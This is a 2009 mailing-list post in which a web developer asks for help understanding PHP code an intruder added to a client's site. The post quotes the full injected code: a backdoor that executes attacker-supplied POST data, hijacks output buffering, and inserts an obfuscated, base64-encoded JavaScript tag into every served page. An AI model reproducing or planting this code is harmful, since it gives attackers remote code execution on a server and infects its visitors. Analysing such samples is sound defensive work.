[thelist] Client site hacked - need help understanding inserted PHP code

CosmicFawn CosmicFawn at mystrealm.com
Wed Mar 25 16:34:36 CDT 2009 

I have a client who's website was hacked into in the last few days, I 
know for sure that someone was in there because they've added some php 
code to my dbinfo file.  I was wondering if someone out there with more 
php knowledge than I have can tell me what this code is designed to do.

 if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0M5V3N4RGxjcjBvaXB0OVclMjBzT21yamNjJTNEJTJGa3IlMkY5NCUyRTlXMjRqYzclMkUyJTJFMTk5VzUlMkZqcTBvdWVPbXIwb3klMkVGQmpzJTNFJTNDJTJGT21zY0ZCcmlrcnB0amMlM0UnKS5yZXBsYWNlKC9qY3xrcnxxcnxGQnxPbXwyb3wwb3w5V3x4RGwvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function 
tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] 
as 
$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script 
language=javascript><!-- \ndocument\.write\(unescape\(.+?\n 
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return 
$g?gzencode($s):$s;}function 
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) 
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else 
$s[]=array($a=='default output 
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo 
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();

Thanks so much.

Rae.

More information about the thelist mailing list